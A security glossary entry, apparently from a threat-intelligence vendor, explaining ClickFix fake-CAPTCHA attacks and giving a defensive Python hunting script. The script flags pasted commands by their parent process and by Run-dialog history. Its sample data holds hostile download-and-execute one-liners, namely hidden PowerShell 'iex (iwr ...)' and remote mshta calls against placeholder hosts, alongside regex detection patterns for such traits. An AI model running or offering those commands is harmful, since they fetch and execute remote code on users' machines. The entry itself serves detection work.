ClickFix
Also known as: Click Fix, Fake CAPTCHA attack
ClickFix is a social-engineering technique that tricks users into running a malicious command themselves — typically via a fake CAPTCHA or error page instructing them to paste text into the Windows Run dialog or terminal. It has become a major delivery method for infostealers like LummaC2.
What is ClickFix?
ClickFix presents a victim with a fake verification or error message ("verify you are human", "fix this error") that instructs them to copy a provided command and paste it into the Windows Run dialog (Win+R) or a terminal. Running it downloads and executes malware — the user effectively infects their own machine.
Why ClickFix works
It sidesteps many automated defences because no exploit and no malicious attachment is involved: the user types the command into a legitimate, trusted process (the shell behind the Run dialog or terminal), so browser download warnings and attachment scanning never see the payload, and the resulting telemetry looks like a user launching a shell. The fake CAPTCHA framing exploits user familiarity with verification prompts, making the instruction feel routine.
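Because the payload is typed by the user, the most reliable signal is where the shell came from rather than what the page looked like. The following is an added detection example, not code from this page or from VantaPrism's tooling. It assumes process-creation records with Sysmon-style fields (ParentImage, Image, CommandLine) flattened into one constructed "Key=Value|Key=Value" line per event, and an export of the Run-dialog history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (each value is the typed command followed by "\1", and MRUList lists value names most-recent first). The sample records and the example.invalid URLs are constructed; the indicator list is illustrative, not a complete signature.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry and Run-dialog history.

Added example (not VantaPrism code). Record format and sample data are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Interpreters a pasted Win+R / terminal command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# explorer.exe is the parent when a command is launched from the Run dialog.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Download-and-execute / evasion traits commonly seen in pasted one-liners (illustrative list).
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile":    re.compile(r"-nop(rofile)?\b", re.I),
    "encoded_cmd":   re.compile(r"-e(nc|ncodedcommand)?\b", re.I),
    "exec_bypass":   re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "invoke_expr":   re.compile(r"\biex\b|invoke-expression", re.I),
    "web_fetch":     re.compile(r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|"
                                r"downloadstring|downloadfile|\bcurl\b|bitsadmin", re.I),
    "url":           re.compile(r"https?://", re.I),
    "mshta_remote":  re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' record; split only on '|' that precedes a key."""
    fields = {}
    for part in re.split(r"\|(?=[A-Za-z]+=)", line.strip()):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(command_line: str) -> set:
    """Names of the indicator patterns present in a command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(command_line)}


def assess(ev: ProcessEvent) -> Optional[dict]:
    """Flag a shell spawned by a user-launch parent whose command line carries >= 2 indicators."""
    user_launched = basename(ev.parent_image) in USER_LAUNCH_PARENTS
    is_shell = basename(ev.image) in SHELLS
    hits = score_command(ev.command_line)
    if not (user_launched and is_shell and len(hits) >= 2):
        return None
    severity = "high" if len(hits) >= 3 else "medium"
    return {"severity": severity, "indicators": sorted(hits), "command": ev.command_line}


def hunt(lines: Iterable[str]) -> list:
    return [a for a in (assess(parse_event(l)) for l in lines if l.strip()) if a]


def runmru_commands(values: dict) -> list:
    """Run-dialog history, most recent first; strips the trailing '\\1' Windows appends."""
    order = values.get("MRUList", "")
    return [values[k][:-2] if values[k].endswith("\\1") else values[k] for k in order if k in values]


def runmru_suspicious(values: dict) -> list:
    return [c for c in runmru_commands(values) if len(score_command(c)) >= 2]


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    # ClickFix one-liner pasted into Win+R: explorer.exe spawns a hidden PowerShell that fetches and runs code.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'CommandLine=powershell -w hidden -nop -c "iex (iwr http://example.invalid/captcha.txt -UseBasicParsing)"',
    # mshta variant typed into the Run dialog.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|"
    r"CommandLine=mshta https://example.invalid/verify",
    # Benign: user opened a shell from the Run dialog and ran ipconfig.
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c ipconfig /all",
    # Benign: editor-spawned PowerShell fetching a file; parent is not a user-launch parent, so not flagged.
    r"ParentImage=C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe|Image=C:\Program Files\PowerShell\7\pwsh.exe|"
    r'CommandLine=pwsh -nop -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"',
]

# Constructed RunMRU export: value names in MRUList order, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/x)"\\1',
}

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"], alert["indicators"], alert["command"])
    print("Run history flagged:", runmru_suspicious(SAMPLE_RUNMRU))
```

The parent-process check is what separates a pasted ClickFix command from a developer's own PowerShell usage: the fourth sample carries three indicators but is not flagged because nothing launched it from explorer.exe. The RunMRU check matters on hosts where process auditing was not enabled at the time, since the typed command survives in the user's registry hive.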
ClickFix is a leading delivery route for modern stealers; VantaPrism captures the resulting stolen data, helping defenders quantify exposure from these self-inflicted infections.
Frequently Asked Questions
Why is ClickFix hard to block?
What does a ClickFix attack look like?
Related Terms
Lumma Stealer (LummaC2) is a malware-as-a-service infostealer that steals browser credentials, cookies, cryptocurrenc…
Infostealer malware is a category of malicious software designed to silently harvest sensitive data — passwords, sess…
Malvertising is the use of online advertising — including paid search ads — to distribute malware. Attackers buy ads…
Phishing is a social-engineering attack that deceives victims into revealing credentials or running malware, usually…